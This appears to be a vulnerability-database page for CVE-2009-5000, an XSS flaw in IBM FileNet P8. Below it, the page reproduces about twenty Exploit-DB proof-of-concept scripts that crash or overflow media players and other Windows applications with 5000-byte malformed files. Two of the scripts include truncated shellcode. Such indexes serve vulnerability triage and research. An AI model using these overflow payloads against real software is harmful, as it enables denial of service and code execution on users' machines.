CVE-2009-5000
published 2010-09-20CVE-2009-5000: Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 4.0.2.x before…
PriorityP415medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
0.84%
53.7th percentile
Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 4.0.2.x before 4.0.2.3-P8AE-FP003 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to .jsp pages.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | filenet_p8_application_engine | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
exploitdb·2009-12-25
CVE-2008-0747 jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
---
#!/user/bin/perl
# Exploit Title: [Local Crash Poc]
# Date: [Fri/Dec/25/2009]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.jetaudio.com]
# Version: [jetAudio v 8.0.0.0 Basic]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";
my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "Done..!~#\n";
Exploit-DB
GPG2/Kleopatra 2.0.11 - Malformed Certificate
exploitdb·2009-10-21
CVE-2009-3805 GPG2/Kleopatra 2.0.11 - Malformed Certificate
GPG2/Kleopatra 2.0.11 - Malformed Certificate
---
#!/usr/bin/env python
################################################################
#
# GPG2/Kleopatra 2.0.11 - Malformed Certificate Crash PoC
# Note: Part of the GPG4Win Package v2.0.1
# Found By: Dr_IDE
# Tested On: 7RC, XPSP3
# Usage: Import the Cert into Kleopatra, GPG2.exe Crashes
#
################################################################
# Seems to only check for the presense of this signature
cert = ("\x99\x03\x2E\x04\x4A\xDC\xA8\x29\x11\x08\x20");
cert += ("\x41" * 5000);
try:
print ("[*] Creating evil GPG cert.");
f1 = open("gpg2_evil_cert.gpg","w");
f1.write(cert);
f1.close();
print ("[*] File created successfully. Import it.");
except:
print ("[-] Error.");
#[pocoftheday.blogspot.com]
Exploit-DB
DJ Studio Pro 4.2 - '.pls' Local Crash
exploitdb·2009-09-15
CVE-2009-4656 DJ Studio Pro 4.2 - '.pls' Local Crash
DJ Studio Pro 4.2 - '.pls' Local Crash
---
#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: when you created the malicious file, load the file and boooom!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "crash.pls";
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "File Created successfully\n";
==EndPoC==
##Greetz: Greetz myself for find the bug.
# milw0rm.com [2009-09-15]
Exploit-DB
Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
exploitdb·2009-09-14
CVE-2009-4107 Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow
---
#!/usr/bin/perl
print qq(
############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ##
## bug found & exploited by: PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
############################################################
);
# Note: I just test this version
$junk ="\x41"x 5000;
$ret = "\x93\x43\x92\x7c";
$nop = "\x90" x 50;
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x31\xc9\x83\xe9\xde\xd9\
Exploit-DB
Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-08-31
CVE-2009-3253 Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)
Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# [email protected]
# Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC
############################################################
##EAX 00000000
##ECX FFFFFFFF
##EDX 004976F0 SwiftUlt.004976F0
##EBX 00000270
##ESP 0013F1CC
##EBP 00000000
##ESI 0013F31B ASCII"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
##EDI 41414141
##EIP 00410CE0 SwiftUlt.00410CE0
#############################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
##############################################################
# milw0rm.com [2009-08-31]
Exploit-DB
Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-08-24
CVE-2009-3969 Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)
Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# [email protected]
# Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC
# http://www.rspq.org/faslo/fs7setup.exe
############################################################
##EAX 41414141
##ECX 004A7CB0 faslow.004A7CB0
##EDX 00145920
##EBX 00000000
##ESP 0012F5B0
##EBP 0012FC84
##ESI 003F9BC9
##EDI 003F9BC9
##EIP 73DD526E MFC42.73DD526E
#############################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
##############################################################
# milw0rm.com [2009-08-24]
Exploit-DB
EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)
exploitdb·2009-07-20
CVE-2009-3536 EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)
EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# EpicVJ 1.2.8.0 (.mpl / .m3u ) Local heap Overflow PoC
# http://www.epicdjsoftware.com/
########################################################################################
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-20]
Exploit-DB
Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)
exploitdb·2009-07-20
CVE-2009-3810 Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)
Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)
---
#!/usr/perl/bin -w
#
#
#Foundr By : D3V!L FucK3r
#
#MY Email: [email protected]
#
#Download : http://www.acoustica.com
#
#Tested on : Windos vista sp1
#
#Version : mp3 audio mixer v.2.471 Demo
#
#if you Click ×××××× and select file then ...... :)
#
# perl For a men :)
#
#Gretz to : Sa^Devl , THEINJECTOR , anti-trust
#
#EAX 03D7ADF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#ECX 41414141
#EDX 01EE0000
#EBX 00004141
#ESP 0012BC48
#EBP 0012BC74
#ESI 03E808E0
#EDI 00100000
#EIP 76ED04C1 ntdll.76ED04C1
$buff="\x41" x 5000;
ope
Exploit-DB
Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash
exploitdb·2009-07-20
CVE-2009-3809 Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash
Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash
---
#!/usr/bin/perl -w
#
# Acoustica MP3 Audio Mixer 1.0 (.sgp file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: www.acoustica.com
#
# Usage to reproduce the bug: when you created the malicious file, open it from the menu of the program and booom!!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "crash.sgp";
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "File Created successfully\n";
==EndPoC==
##Greetz: Greetz myself for find the bug.
# milw0rm.com [2009-0
Exploit-DB
MixSense 1.0.0.1 DJ Studio - '.mp3' Crash
exploitdb·2009-07-16
CVE-2009-3808 MixSense 1.0.0.1 DJ Studio - '.mp3' Crash
MixSense 1.0.0.1 DJ Studio - '.mp3' Crash
---
#!/usr/bin/perl -w
#
# MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: MixSense
#
# Usage to reproduce the bug: when you created the malicious file, open with Mixsense and booom!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "crash.mp3";
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "File Created successfully\n";
==EndPoC==
##Greetz: Greetz myself for find the bug.
# milw0rm.com [2009-07-16]
Exploit-DB
MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
exploitdb·2009-07-16
CVE-2009-2650 MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-16]
Exploit-DB
MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)
exploitdb·2009-07-14
CVE-2009-3807 MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)
MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC
# http://www.softpedia.com/progDownload/MixVibes-Pro-Download-3074.html
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.vib');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-14]
Exploit-DB
JetAudio 7.5.3 COWON Media Center - '.wav' Crash
exploitdb·2009-07-14
CVE-2009-3948 JetAudio 7.5.3 COWON Media Center - '.wav' Crash
JetAudio 7.5.3 COWON Media Center - '.wav' Crash
---
#!/usr/bin/perl -w
#
# JetAudio 7.5.3 COWON Media Center(.WAV file) Memory Comsumption DoS Exploit
#
# Founded and exploited by prodigy
#
# Vendor: JetAudio
#
# Usage to reproduce the bug: you need a file of recorded music in .wav,and then open it with JetAudio and booom!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "c:\filerecorder.wav" #the file must be recorded with music
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
==EndPoC==
##Greetz: Greetz myself for find the bug.
# milw0rm.com [2009-07-14]
Exploit-DB
ScITE Editor 1.72 - Local Crash
exploitdb·2009-07-13
CVE-2009-3857 ScITE Editor 1.72 - Local Crash
ScITE Editor 1.72 - Local Crash
---
#!/usr/bin/perl
#
#######################################################################
#
# ScITE Editor 1.72 crash vulnerability Exploit
#
########################################################################
#
# Bug Founded by prodigy
#
########################################################################
# ### PoC ### #
############################################################################################
my $owned="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open(myfile,'>>crash.rb');
print myfile $owned;
close(myfile);
############################################################################################
[!]Usage: when you created the file is open with SciTE, and move the scroll bars
##
Exploit-DB
otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)
exploitdb·2009-07-09
CVE-2009-3812 otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)
otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-09]
Exploit-DB
PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-07-01
CVE-2009-2384 PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)
PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)
---
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # PEamp 1.02b (.M3U File) Local Stack Overflow POC ##
# # Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)
# milw0rm.com [2009-07-01]
Exploit-DB
SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)
exploitdb·2009-06-29
CVE-2009-2403 SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)
SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ###############################################################################
# SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC
# ###############################################################################
# Found By :: HACK4LOVE
## Olly registers
#EAX 00A71FF8
#ECX 41414141 _____>>control over the register
#EDX 41414141
#EBX 00000180
#ESP 0012E758
#EBP 0012E778
#ESI 00000008
#EDI 00000017
#EIP 00465B25 SCMPX.00465B25
##################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.M3U');
print myfile $crash;
##################################################################################
# milw0rm.com [2009-06-29]
Exploit-DB
Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
exploitdb·2009-03-02
CVE-2009-0885 Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
---
#!usr/bin/perl #
# Discovered & Coded by : Hakxer #
# Media Commands (M3U,M3l,TXT,LRC Files) Crash PoC #
# Greetz : Allah , ProViDoR , Egyptian x Hacker #
# Team : Egy coders Team #
# Download/http://www.mediacommands.com/download.html#
# Description : #
# Import Hakxer.[Ext] Into program ... #
# Program Get Crashed ;) #
######################################################
my $crash="http://"."A" x 5000;
my $CoDe=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x77\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x79\x79\x6b\x4c\x70".
"\x6a\x78\x6b\x52\x6d\x4
No writeups or analysis indexed.
2010-09-20
Published